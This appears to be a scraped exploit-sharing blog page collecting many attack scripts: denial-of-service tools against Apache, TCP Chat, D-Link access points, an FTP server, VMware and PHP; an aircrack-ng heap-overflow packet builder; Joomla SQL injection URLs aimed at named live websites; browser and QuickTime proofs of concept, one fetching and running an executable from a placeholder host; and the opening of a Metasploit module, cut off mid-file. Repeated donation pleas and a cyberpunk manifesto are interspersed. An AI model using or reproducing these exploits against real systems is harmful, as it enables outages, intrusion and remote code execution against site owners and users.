* If multiple different Apache processes are utilized, an attacker can spread
* the substantial leak between processes to dodge resource limits imposed on
* httpd's UID (usually nobody, www, or apache)
*
* Credit: iDEFENSE reported this issue to several security lists on April 8,
* 2003 following the Apache release announcement. Apache fixed the flaw about
* a month after the initial disclosure of this vulnerability. iDEFENSE credits
* the discovery of this vulnerability to an anonymous researcher.
*
* Happy Hunting!
*/

#ifndef _WIN32
#include
#include
#include
#include
#include
#include
#include
#include
#else
#include
#pragma comment(lib, "wsock32.lib")
#endif
#include
#include

int sig_fired = 0;

#ifndef _WIN32
void sig_handler(int sig) {
#else
BOOL WINAPI sig_handler(DWORD dwCtrlType) {
#endif
sig_fired = 1;
#ifndef _WIN32
return;
#else
return TRUE;
#endif
}

int main(int argc, char *argv[]) {
SOCKET s;
struct sockaddr_in sin;
char buffer[1025];
struct hostent *he;
unsigned short iPort = 80;
int newlines = 100;
char *p;
char *p2;
int i;
#ifdef _WIN32
WSADATA wsa_prov;
#endif
printf("Apache Massacre v1.0\r\n");
printf("Exploit by Matthew Murphy\r\n");
printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");
#ifdef _WIN32
if (WSAStartup(0x0101, &wsa_prov)) {
perror("WSAStartup");
exit(1);
}
#endif
printf("Please enter the web server's host/IP: ");
fgets(&buffer[0], 1024, stdin);
he = gethostbyname(&buffer[0]);
if (!he) {
perror("gethostbyname");
exit(1);
}
sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
printf("Please enter the web server's port: ");
fgets(&buffer[0], 1024, stdin);
iPort = (unsigned short)atoi(&buffer[0]);
#ifndef _WIN32
#ifdef _SOLARIS
sigset(SIGINT, &sig_handler);
#else
signal(SIGINT, &sig_handler);
#endif
#else
SetConsoleCtrlHandler(&sig_handler, TRUE);
#endif
printf("How many newlines should be in each request [100]: ");
fgets(&buffer[0], 1024, stdin);
if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) {
newlines = atoi(&buffer[0]);
}
p = malloc(newlines*2);
p2 = p;
for (i = 0; i < newlines; i++) {
*p2 = 0x0D;
p2++;
*p2 = 0x0A;
p2++;
}
newlines += newlines;
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
perror("socket");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(iPort);
if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) {
perror("connect");
exit(1);
}
while (1) {
if (!send(s, (char *)p, newlines, 0) == newlines) {
perror("send");
exit(1);
}
if (sig_fired) {
printf("Terminating on SIGINT");
free(p);
#ifndef _WIN32
close(s);
#else
closesocket(s);
WSACleanup();
#endif
exit(0);
}
}
}

Ping of Death Remote Denial of Service Exploit

Ping of Death Remote Denial of Service Exploit
ping -l 65510 your.host.ip.address

TCP Chat (TCPX) 1.0 Denial of Service Exploit

TCP Chat (TCPX) 1.0 Denial of Service Exploit

/*

TCP Chat(TCPX) DoS Exploit
----------------------------------------

Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed

Tested on Windows2000 SP4
Info: andrew.nile@gmail.com

*/

#include
#include
#include

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"*** TCP Chat 1.0 DOS Exploit \n"
"***-----------------------------------------------\n"
"*** Infam0us Gr0up - Securiti Research Team \n\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n";

int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET inetdos;

if (argc < 2) { printf(" TCP Chat(TCPX) DoS Exploit \n", argv[0]); printf(" ------------------------------------------\n", argv[0]); printf(" Infam0us Gr0up - Securiti Research\n\n", argv[0]); printf("[-]Usage: %s [target] [port]\n", argv[0]); printf("[?]Exam: %s localhost 1234\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 1234; if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);

inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" TCP Chat(TCPX) DoS Exploit \n", argv[0]);
printf(" ------------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);

printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}

D-Link Wireless Access Point (Fragmented UDP) DoS Exploit

D-Link Wireless Access Point (Fragmented UDP) DoS Exploit/*
 *  
 *  
 * D-Link Wireless Access Point
 * Fragmented UDP DoS Proof of Concept 
 *  
 *
 * gcc -o dlink_dos dlink_dos.c -lnet -Wall 
 *    
 */     
    
#include <libnet.h>
    
#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111
    
void usage (char *name)
{   
    fprintf (stderr,
             "Usage: %s -s <source ip> -d <destination ip>\ 
   -a <source port> -b <destination port> \n",
             name);
        
    exit (EXIT_FAILURE);
}
    
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
                u_short dPRT, int count)
{                           

    libnet_t *l = NULL;
    libnet_ptag_t udp = 0;
    libnet_ptag_t ip = 0;
    
    char errbuf[LIBNET_ERRBUF_SIZE];
    char *payload = NULL;
    u_short payload_s = 0, src_prt, dst_prt;
    u_long src_ip, dst_ip;
    int c, frag;
        
    if (!device)
        device = DEVICE;
        
    l = libnet_init (LIBNET_RAW4, device, errbuf);

    if (!l) {
        fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
        exit (EXIT_FAILURE);
    }
 
    src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
        libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);

    dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
        libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);

    src_prt = sPRT ? sPRT : SRC_PRT;

    dst_prt = dPRT ? dPRT : DST_PRT;

    if (count == 1) {
        payload = "\0\0\0\0\0\0\0\0";
        payload_s = 8;
    }

    udp = libnet_build_udp (src_prt,
                            dst_prt,
                            (LIBNET_UDP_H + payload_s) * 2,
                            0, (unsigned char *)payload, payload_s, l, udp);

    if (udp == -1) {
        fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    switch (count) {

    case 1:
        frag = IP_MF;
        break;

    case 2:
        frag = 0x2002;
        break;

    case 3:
        frag = 0x0003;
        break;
    }

    ip = libnet_build_ipv4 (20,
                            0,
                            1800,
                            frag,
                            128,
                            IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);

    if (ip == -1) {
        fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    c = libnet_write (l);

    if (c == -1) {
        fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
        exit (EXIT_FAILURE);
    }

    printf ("Wrote UDP packet; check the wire.\n");

    libnet_destroy (l);

    return (EXIT_SUCCESS);

}

int main (int argc, char **argv)
{

    int i;
    char *pDST, *pSRC, *device;
    u_short dPRT = 0;
    u_short sPRT = 0;

    pDST = pSRC = device = NULL;

    while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
        switch (i) {
        case 'D':
            device = optarg;
            break;
        case 'd':
            pDST = optarg;
            break;
        case 's':
            pSRC = optarg;
            break;
        case 'a':
            sPRT = atoi (optarg);
            break;
        case 'b':
            dPRT = atoi (optarg);
            break;
        case 'h':
            usage (argv[0]);
            break;
        }
    }

    printf ("\n----------------------------------\n");
    printf ("      -=    D-Link DoS PoC     =-\n");
    printf ("          Aaron Portnoy\n");
    printf ("       deft () thunkers ! net     \n");
    printf ("   silc.thunkers.net, thunkers\n");
    printf ("----------------------------------\n");


    device ? printf ("\nDevice: \t%s\n", device) :
        printf ("\nDevice: \t%s\n", DEVICE);

    pSRC ? printf ("SRC IP: \t%s\n", pSRC) :
        printf ("SRC IP: \t%s\n", SRC_IP);

    pDST ? printf ("DST IP: \t%s\n", pDST) :
        printf ("DST IP: \t%s\n", DST_IP);

    sPRT ? printf ("SPort: \t\t%d\n", sPRT) :
        printf ("SPort: \t\t%d\n", SRC_PRT);

    dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :
        printf ("DPort: \t\t%d\n\n", DST_PRT);

    for (i = 1; i <= 3; i++)
        gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
    printf ("\n");

    return (EXIT_SUCCESS);
}

Microsoft Word Document (malformed pointer) Proof of Concept

Microsoft Word Document (malformed pointer) Proof of Concept

=====
The file I have attached is a very basic two stage bug. stage 1 (the
first mod) forces the code down a wrong path. the second mod by
itsself is harmless, however when used with the first it will be the
first and part of the second overwrite.

I have use 41414141 as a marker to make it easier for you to see.

I have made it crash the wordviewer again to make it more obvious

Weight,
location: 00000274
value : 00000022 - just so it crashes, values 00000001 -> 00000006
are probably the most useful for trying to overwrite a pointer. notice
that neighbouring areas can be weighted the same.

marker,
location: 000027e4
value : 41414141

the weight destination address == ((weight * 4[this is EDI]) + 4 [ECX*4]) + source memory offest[ESI].

[also the meta data is microsofts, not mine]
======

bug hugs,

Home FTP Server 1.4.5 Remote Denial of Service Exploit

HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!

Home FTP Server 1.4.5 Remote Denial of Service Exploit

# Discovered by 0in from DaRk-CodeRs Programming & Security Group

# Thats a very funny bug, and nobody understand how it works;]

# When we send a python FTP retrlines() function bad command and create

# a new connection server got DoS... o0

# Thats not overflow, it's probubly in logic application.

# Special THX to: Rade0n3900

# Debug:

# ----------------------

# | EIP: 0100FE98 |

# | DS:[00FFFFED4]=??? |

# | ECX: 0100FED4 |

# ----------------------

from ftplib import FTP

import time

ip="127.0.0.1"

passwd = 'andrew.nile@gmail.com'

print '-------------------------------'

print '| HOME FTP SERVER DoS Exploit |'

print '| bY 0in From Tringle2011! |'

print '|>>http://dark-coders.4rh.eu<<|'

print '-------------------------------'

print 'connecting...'

ftp=FTP(ip)

ftp.login(login,passwd)

print 'sending...'

try:

ftp.retrlines("AAAA")

except Exception:

print 'ok!\nreconnecting...'

ftp=FTP(ip)

ftp.quit()

print 'DosEd'

#EoFF

VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service Exploit

VMware <= 2.5.1 (Vmware-authd) Remote Denial of Service ExploitVmware <= 2.5.1 build-126130 Remote Denial of Service

Application: Vmware

Web Site: http://www.vmware.com/

Platform: Windows *

Bug: Remote Denial of Service

Tested agains: Vmware player 2.5.1 build-126130, workstation 2.5.1 build-126130, using Windows XP SP3 fully patched

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Credits

================

1) Introduction

================

"VMware desktop virtualization technology lets you run multiple operating systems on a single physical computer.
Easily run Windows applications on your Mac, including high end games and other graphic applications, 
with VMware Fusion. Run Windows and Linux applications on Windows or Linux PCs with the free VMware Player."

=======

2) Bug

=======
Vmware-authd listen on 0.0.0.0 port 912 on a windows box by default.
A denial of service exist in the module vmwarebase.dll of the system process vmware-authd.exe when a long username
or password is supplied to the service, code execution doesn't look possible at this time.
A dump file will be created here: C:\Documents and Settings\LocalService\Application Data\VMware\vmware-authd-*.dmp
Also some old version of this binary (like 6.00.3938.0000) doesn't seems vulnerable to this DoS.
==================

3)Proof of concept

==================
Auth-dos.py :

import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = 'A' * 350
target = '192.168.0.102'
port = 912
s.connect((target, port))
data = s.recv(1024)
s.send('USER '+buff+'\r\n')
data = s.recv(1024)
s.send('PASS yo \r\n')
data = s.recv(1024)
print " [+] sending dummy payload"
s.close()
print " [+] done! "

=====

MovieLibrary Local Dos .dmv file

MovieLibrary v1.4.401 Local Dos .dmv File

# Exploit Title: MovieLibrary Local Dos .dmv file
# Date: April 17, 2011
# Software Link: [http://wensoftware.com/]
# Version: v1.4.401
# Tested on: Windows XP SP3
# Author: tringle2011
# Email: andrew.nile@gmail.com

# At the top: Click -> New -> Open
# Open the newly created dmv file
# Click File ->  Import Database
# Program will stop responding after about 5 sec
#
# Greetz to the Exploit-DB Crew and More Coffee!
# I AM YOU

#!/usr/bin/env python
import time
 
print "Press Play >\n"
time.sleep(1)
 
VHS=open('oldies.dmv', 'w')
VHS.write('\x00')
VHS.close()
 
print 'Running Time: Approximately 5 sec till DoS.\n'

MovieLibrary v1.4.401 Local Dos .dmv File
=========================================

# Exploit Title: MovieLibrary Local Dos .dmv file
# Date: April 14, 2010
# Software Link: [http://wensoftware.com/]
# Version: v1.4.401
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [www.setfreesecurity.com]
#
# At the top: Click -> New -> Open
# Open the newly created dmv file
# Click File ->  Import Database
# Program will stop responding after about 5 sec
#
# Greetz to the Exploit-DB Crew and More Coffee!
# I AM YOU
#
#!/usr/bin/env python
import time
 
print "Press Play >\n"
time.sleep(1)
 
VHS=open('oldies.dmv', 'w')
VHS.write('\x00')
VHS.close()
 
print 'Running Time: Approximately 5 sec till DoS.\n'

IE6 / 7 Remote Dos vulnerability

IE6 / 7 Remote Dos vulnerability
# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 17/05/2011
# Author: TRINGLE2011
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.
 
# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder    
causing a dos and may lead to code execution.
 
#code
 
<html>
<head>
<script>
 
function dos(){
 
  var e = document.createElement('frame');
  var prop = 'frameBorder';
 
  e[prop] = 0123456789;
}
 
</script>
</head>
<body onload="dos()">
</body>
 
</html>

Title : Adobe Acrobat Reader acroform_PlugInMain memory corruption
Product: Adobe Acrobat Reader
Product Homepage: www.adobe.com
---------------------------------------------------------------------------
Author  : ITSecTeam
Email   : Bug@ITSecTeam.com
Website : http://www.itsecteam.com
Forum   : http://forum.ITSecTeam.com
---------------------------------------------------------------------------
POC: http://www.itsecteam.com/files/adb_poc2.zip
---------------------------------------------------------------------------
System Affected:
Adobe Acrobat reader 7.x
Adobe Acrobat Reader 8.x
Adobe Acrobat reader 9.x
 
Tested version :
Adobe Acrobat 8.1
Adobe Acrobat 9.2
Adobe Acrobat 9.3
Adobe Acrobat 9.3.4

PHP 5.3.x Denial of Service

HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!

PHP 5.3.x Denial of Service//#DOS Php 5.3.x
//###########################################################################
//#Title: Dos Php 5.3.0
//#Vendor: http://php.net
//#Tested On Php 5.3.0 On Windows xp Sp3 And Redhat
//###########################################################################
//#AUTHOR: TRINGLE2011
//#Email: andrew.nile@gmail.com
//#Thanks: my friends and Google
//###########################################################################
//#
//# Exploit
//###########################################################################
<?php
$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
for($i=0;$i<2;){
$buff=bcpow($junk, '3', 2);
$buff=null;
}
//Coded By Pejvak;
?>

Aircrack-NG Tools svn r1675 Remote Exploit

HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!

Aircrack-NG Tools svn r1675 Remote Exploit#!/usr/bin/env python
# -*- coding: UTF-8 -*-
 
''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.
     
    The tools' code responsible for parsing IEEE802.11-packets assumes the
    self-proclaimed length of a EAPOL-packet to be correct and never to exceed
    a (arbitrary) maximum size of 256 bytes for packets that are part of the
    EAPOL-authentication. We can exploit this by letting the code parse packets
    which:
     a) proclaim to be larger than they really are, possibly causing the code
        to read from invalid memory locations while copying the packet;
     b) really do exceed the maximum size allowed and overflow data structures
        allocated on the heap, overwriting libc's allocation-related
        structures. This causes heap-corruption.
     
    Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-
    path. Careful layout of the packet's content can even possibly alter the
    instruction-flow through the already well known heap-corruption paths
    in libc. Playing with the proclaimed length of the EAPOL-packet and the
    size and content of the packet's padding immediately end up in various
    assertion errors during calls to free(). This reveals the possibility to
    gain control over $EIP.
     
    Given that we have plenty of room for payload and that the tools are
    usually executed with root-privileges, we should be able to have a
    single-packet-own-everything exploit at our hands. As the attacker can
    cause the various tools to do memory-allocations at his will (through
    faking the appearance of previously unknown clients), the resulting
    exploit-code should have a high probability of success.
 
    The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev
    r238 to work. It generates pcap-file with single packet of the following
    content:
     
    0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0
    108000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172
    3F
 
    
'''
 
import cpyrit.pckttools
import scapy.layers
 
# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second
# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-
# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and
# struct WPA_hdsk.
# We have plenty of room for exploit-payload as most of the fields in the
# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent
# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in
# case of airodump-ng...
pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00',       \
                                addr2='00:de:ad:c0:de:01',       \
                                FCfield='to-DS')                 \
       / scapy.layers.dot11.LLC()                                \
       / scapy.layers.dot11.SNAP()                               \
       / scapy.layers.l2.EAPOL(len=65000)                        \
       / cpyrit.pckttools.EAPOL_Key()                            \
       / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \
       / scapy.packet.Padding(load='Can I has some moar?')
 
if __name__ == '__main__':
    print "Packet's content:"
    print ''.join("%02X" % ord(c) for c in str(pckt))
    filename = 'aircrackng_exploit.cap'
    print "Writing to '%s'" % filename
    writer = cpyrit.pckttools.Dot11PacketWriter(filename)
    writer.write(pckt)
    writer.close()
    print 'Done'

Monday, May 16, 2011

A Cyberpunk Manifesto v2.0 2003 year [English]

==============================================

A Cyberpunk Manifesto v2.0 2003 year [English]

==============================================

HELP US! IF U WANT! SEND US DONATION ON : VILL+P.O- BIKI HAKOLA, DIST-HOWRAH, STATE- WEST BENGAL, INDIA & PIN CODE(ZIP CODE): 711322 OR SEND VIA WESTERNUNION BY PHONING ME ON : +919903865380. PLZ!!!
//English

We are those with analog/digitalised soul. Cyberpunks. This is to be A second manifestation.

> Cyberpunk.

We are the neo men. Those new species of homosapiens, that were meant to be born at this age.

The way we feel the world, includes the cyberspace as natural. Our first breath take in this world, at the moment of our birth, consisted the dense of electricity flow in wires, the machinery buzz surrounding the place, the data vibrations on information high-ways on air and cable. The way we take technology equals the way others take food, water and air. The data-space it self is the extra element of our enviorment. But we are that mutation, which is not only ordinary presense of technological tools.

Everybody can learn and become to understand technology and new technology, but we are those, who have got it naturaly. We are those that see reality in a different way. Our point of view shows more than ordinary people can see. They see only what is outside, but we see what is inside. That's what we are - realists with the glasses of dreamers. The way we think and look out to the enviorment, the blood that rushes trough our veins, the air that fizzles in our brains - it is that mutation that distinguish us from others.

Being a net-head, a technological-geek, computer nerd is not it, that's a sign. We are new; every and each area of the new being is something we take as homely and familiar. We know history and we know it is dead crawling for life. A Cyberpunk is just a label word, the content inside is us - the man and women who are different, most of us are out of understanding. You can call us crazy, mad, insane, strange, wierdos - that is the most close word in your dictionary to cover what you think of something never manifested before.

Most of today's world is meeting a serious change. Some are sticking with the ruins, some are moving ahead letting go of the past. Society, which still does not want to refresh its self, have found the stability of its existance in the old-approved ways of accepting the ordinary and known. But we are none of them. Cyberpunks will always be refreshing. And even those who claim that cyberpunks is dead, will be just the ones that can not see it reborn in the new wave of discoveries. You can't say that evolution has stopped, or can you.

"Cyberpunks", we are that evolving part. The rebel, who fights for its own survival. And we believe in our strength, because our advantage is that of understanding new fenomenas, which are unclear to the rest, but part of our being.

> Society.

The society prefers to follow a leader. That leader is the one who controls it. People who take decisions on the basis of what they have been told what is right and wrong, are those who follow and trust blindly. Society should learn and find out by the trail of try and fail. Society is a mass, being controlled remotely and or localy by the system and its authorities. The society however, is settled down, prefers to listen and obey.

Society is a mainframe picture of masses who wish to have someone to follow and not live on their own choice. Therefore the society is controlled by the corporations and the governments in a sequence of systems and schematics of chaos control under the big bro's trigger.

Society have created what it needed to have - the bow before leadership of government and corporative kind. Society than was filled up with hatred toward the dangers for the System's integrity.

In times people did need someone to foloow, that someone found it out to be easy to gain profit out of the controlled society and that someone begun to control with dirty tricks, getting away with it, because being the only authority, the controlling System was unvincible. Soceity now remains under control and somelike enjoys it.

Society denies us, because we are far more dagerous to their utopia, then the governments are.

We do not belong to those society masses.

> The System

The System. Centuries-old, existing on principles that hang no more today. A System that has not changed much since the day of its birth. The system is what controls you.

That is the goverment, consisted of people who live separately from the social masses. Governments have not changed since the birth of social living in humen beings. On the other hand the control is with corporations and there is a question who actualy has the control. Is it the corporations who control the governments or they are both the same bureau. However the system is what needs food and support to exist, that support is given by the masses of society, which are like hypnotised when coming to trust someone to have control over the personal life of each member of them.

That support comes by, when the system shoots lies to the social mass. Lies are the truths they want us to believe in. The System must impose its truth upon us so that it can rule. The government needs us follow it blindly. Not only the governemtns, but the corporations, they dictate fashion styles, food choice and medicational prices. They both, Governments and Corporations are what the System is.

A set of rules, filled in by the media. Only a blind and deaf, would grant control over his life to a someone whos greed for money and power is covered by impression of Care, Support, Security and Stability. The system is afraid of chaos, but chaos is just the way they call the possibility of free choice. Where decentralised - people would be able to do better trough.

> The media.

Television, radio and press is no longer the only source of information for the seeking man or for the sleeping one. The Internet is the new mediaspace, a space where information can be spread freely and therefore no one is living in informational eclipse now. Even where governments and bussineses are trying to set restrictions and control over data flow - there are ways to gather that information, which can 'englight'.

And Information still remains power. We are whitnessing the actual growth of our race. No longer informational barriers block the real potential sight and now people can demand more rights. Scientists are making discoveries, which when made public can no longer be so easily blocked for comercial or govermental use. Sad is when people stomped down are willingless to demand what is granted to them. Now the media can awaken people, transform societies. The media however have proven to be false or missleading, which confuses in truth filtering, that just rises Information's price.

> Where are we?

We are those whose DNA is starting to form a new sight and sense - that which will allow the future generations to comprehend with cyberspace, the data-space. No heavy or implanted hardware devices will be able to fully replace what the nature is giving us.

Mutations are taking place. The evolution granted us with a better set of tools to interact with the enviormental changes. That is why we are cyberpunks, neo humen, electronic minds. We know that the Cyberspace is a mirror world, an enhancement, which hosts all past and present creations of man.

The cyberspace is that invisible world where, humen mind and thought merge with matery and takes form visible to the senses, trough machines. The cyberspace seems like it always have existed there, here, everywhere - but only now we are making connections and discovering it - we are begining to change.

Cyberpunks - we are those who live in cyberspace and using the curent technology is only the vessel to bring us on the other side.

We are the altered new race. Cyberpunks.
This is to be A second manifestation.

Joomla Component (com_cbcontact) SQL Injection Vulnerabilities

###
# Title : Joomla Component (com_cbcontact) SQL Injection Vulnerabilities
# Author : Tringle2011
# E-mail : andrew.nile@gmail.com
# platform : php
# Impact : Multiple SQL Injection Vulnerabilities
# Tested on : Windows XP sp3 & Linux.(Ubuntu 10.10) En
###

###

# (+) Exploit & PoC :

/index.php?option=com_cbcontact&task=vcard&contact_id=-11[SQLi]
/index.php?option=com_cbcontact&task=view&contact_id=-11[SQLi]

# (!) Demo :

http://www.thic.dk/ntu/index2.php?option=com_cbcontact&task=vcard&contact_id=-11
http://www.cfc-indonesia.org/index.php?option=com_cbcontact&task=view&contact_id=-11

# (^_^) ! Good Luck ALL ...

Thursday, May 12, 2011

(Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits

<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on :Windows XP SP3 (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5
###
# (~) Greetings To : all my hacker friends
###
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
function boom()
 {
 var longunistring1 = unescape("%u4141%u4141");
 var longunistring2 = unescape("%u4242%u4242");
 var longunistring3 = unescape("%u4343%u4343");
 var longunistring4 = unescape("%u4444%u4444");
 for(i=0; i <= 999 ; ++i) 
 {
  longunistring1+=longunistring1;
  longunistring2+=longunistring2;
  longunistring3+=longunistring3;
  longunistring4+=longunistring4;
  document.write(longunistring1);
  document.write(longunistring2);
  document.write(longunistring3);
  document.write(longunistring4);
 }     
 document.write(longunistring1);
 document.write(longunistring2);
 document.write(longunistring3);
 document.write(longunistring4);
 document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script> 
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save Any HTML Code and Use him ( Boom !! :D )

This is really great..use it..and comment on it...

Wednesday, May 11, 2011

vlc_amv.rb 12140 2011-03-26 00:07:36Z sinn3r

##
# $Id: vlc_amv.rb 12140 2011-03-26 00:07:36Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info={})
        super(update_info(info,
            'Name'        => "VLC AMV Dangling Pointer Vulnerability",
            'Description' => %q{
                This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st
                byte in the file format (video width/height), VLC crashes due to an invalid pointer, which
                allows remote attackers to gain arbitrary code execution.
                 
                The vulnerable packages include:
                VLC 1.1.4
                VLC 1.1.5
                VLC 1.1.6
                VLC 1.1.7
                },
            'License'     => MSF_LICENSE,
            'Version'     => "$Revision: 12140 $",
            'Author'      =>
                [
                    'sinn3r',
                ],
            'References' =>
                [
                    ['CVE', 'CVE-2010-3275'],
                    ['URL', 'http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files'],
                ],
            'Payload' =>
                {
                    'BadChars'        => "\x00",
                    'space'           => 1000,
                    'StackAdjustment' => -3500,
                },
            'DefaultOptions' =>
                {
                    'ExitFunction' => "process",
                    'InitialAutoRunScript' => 'migrate -f',
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    [ 'Automatic', {} ],
                    [ 'Windows XP SP3 IE6', {'Ret'=>0x0c0c0c0c} ],
